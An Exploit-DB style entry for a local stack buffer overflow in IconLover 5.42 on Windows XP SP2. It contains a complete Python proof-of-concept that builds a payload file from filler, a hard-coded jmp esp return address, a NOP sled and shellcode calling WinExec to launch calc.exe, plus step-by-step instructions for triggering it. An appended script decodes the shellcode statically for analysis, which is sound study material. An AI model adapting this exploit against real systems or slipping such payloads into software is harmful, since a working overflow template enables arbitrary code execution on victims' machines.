IconLover 5.42 – Local Buffer Overflow

  • Author: cor3sm4sh3r
    Date: 2015-09-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38349/
#!/usr/bin/env python
# Exploit Title: IconLover v5.42 Buffer Overflow Exploit
# Date: 29/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# Category: Local
# Tested : win XP professional sp2

'''
Credits & Authors:
==================
ZwX (http://zwx.fr/)
[http://www.vulnerability-lab.com/show.php?user=ZwX]

#References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1609

Affected Product(s):
====================
AHA-Soft
Product: IconLover - Software (Windows) 5.42 and 5.45


Manual steps to exploit...
1. Copy the content of exploit.txt to your clipboard
2. Run the IconLover.exe software
3. Click the File -> New Icon Library option
4. Click the Library and push the Download button
5. Paste the AAAA+... string into the Website Address (URL) input, click OK and hide
6. Successful exploitation will open an instance of calc.exe!
'''

#badchars = "\x00\x0a\x0d"
# All payload pieces are bytes literals so the file is written byte-for-byte
# (a text-mode str would be re-encoded and corrupt bytes such as \x90 and \xed).
junk = b"\x41" * 1039                      # filler up to the saved return address
eip = b"\xed\x1e\x94\x7c"                  # jmp esp 7c941eed ntdll.dll ( XP sp2 )
nopsled = b"\x90" * 20

shellcode  = b"\x33\xc0"                   #=> XOR EAX,EAX | Zero out EAX register
shellcode += b"\x50"                       #=> PUSH EAX    | Push EAX to have null-byte padding for "calc.exe"
shellcode += b"\x68\x2E\x65\x78\x65"       #=> PUSH ".exe" | Push the ASCII string to the stack
shellcode += b"\x68\x63\x61\x6C\x63"       #=> PUSH "calc" |
shellcode += b"\x8B\xC4"                   #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX
shellcode += b"\x6A\x01"                   #=> PUSH 1      | Push uCmdShow parameter to the stack
shellcode += b"\x50"                       #=> PUSH EAX    | Push the pointer to lpCmdLine to the stack
shellcode += b"\xBB\x4d\x11\x86\x7C"       #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX
shellcode += b"\xFF\xD3"                   #=> CALL EBX
shellcode += b"\x33\xc0"                   #=> XOR EAX,EAX | Zero out EAX register
shellcode += b"\x50"                       #=> PUSH EAX    | Push EAX
shellcode += b"\xBB\xa2\xca\x81\x7c"       #=> MOV EBX,7C81caa2 | Exit process
shellcode += b"\xFF\xD3"                   #=> CALL EBX

packet = junk + eip + nopsled + shellcode + nopsled

# Binary mode: no newline translation, no text encoding of the payload
with open('exploit.txt', 'wb') as out:
    out.write(packet)
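As an added analysis example (not part of the original PoC or the author's code), the following script statically decodes the shellcode quoted above: it walks the handful of x86 opcodes used (xor/push/mov/call), reassembles the string built on the stack by the consecutive `push imm32` instructions, and lists the absolute addresses reached through `mov ebx,imm32; call ebx`. This is how an analyst triages such a payload without executing it; `SAMPLE` and `decode` are names introduced here for the example.

```python
#!/usr/bin/env python3
"""Static stack-string and call-target decoder for the small x86 shellcode above."""
import struct

# The shellcode bytes from the listing, copied here so the script runs stand-alone
# (constructed sample for this example, not generated by the original PoC).
SAMPLE = (b"\x33\xc0\x50"
          b"\x68\x2e\x65\x78\x65"          # push ".exe"
          b"\x68\x63\x61\x6c\x63"          # push "calc"
          b"\x8b\xc4\x6a\x01\x50"
          b"\xbb\x4d\x11\x86\x7c\xff\xd3"  # mov ebx,imm32 ; call ebx
          b"\x33\xc0\x50"
          b"\xbb\xa2\xca\x81\x7c\xff\xd3")

def decode(code):
    """Return (stack_string, call_targets).

    stack_string: ASCII assembled from the 'push imm32' sequence, in memory order.
    call_targets: absolute addresses loaded into EBX before each 'call ebx'.
    Raises ValueError on any opcode outside the small set handled here.
    """
    i, ebx, pushes, calls = 0, None, [], []
    while i < len(code):
        op = code[i]
        if code[i:i + 2] == b"\x33\xc0":       # xor eax,eax
            i += 2
        elif op == 0x50:                       # push eax
            i += 1
        elif op == 0x68:                       # push imm32: 4 raw bytes land on the stack
            pushes.append(code[i + 1:i + 5])
            i += 5
        elif op == 0x6a:                       # push imm8 (uCmdShow here)
            i += 2
        elif code[i:i + 2] == b"\x8b\xc4":     # mov eax,esp
            i += 2
        elif op == 0xbb:                       # mov ebx,imm32 (little-endian address)
            ebx = struct.unpack("<I", code[i + 1:i + 5])[0]
            i += 5
        elif code[i:i + 2] == b"\xff\xd3":     # call ebx
            calls.append(ebx)
            i += 2
        else:
            raise ValueError("unhandled opcode 0x%02x at offset %d" % (op, i))
    # The stack grows downward, so the last push sits lowest in memory: reverse the order.
    text = b"".join(reversed(pushes)).decode("ascii", "replace")
    return text, calls

if __name__ == "__main__":
    s, targets = decode(SAMPLE)
    print("stack string: %r" % s)
    print("call targets: %s" % ", ".join("0x%08X" % t for t in targets))
```

Against the sample it recovers the command string "calc.exe" and the two hard-coded XP SP2 addresses the listing annotates as WinExec and ExitProcess; an unknown opcode raises instead of silently skipping, so a modified payload is flagged rather than misread.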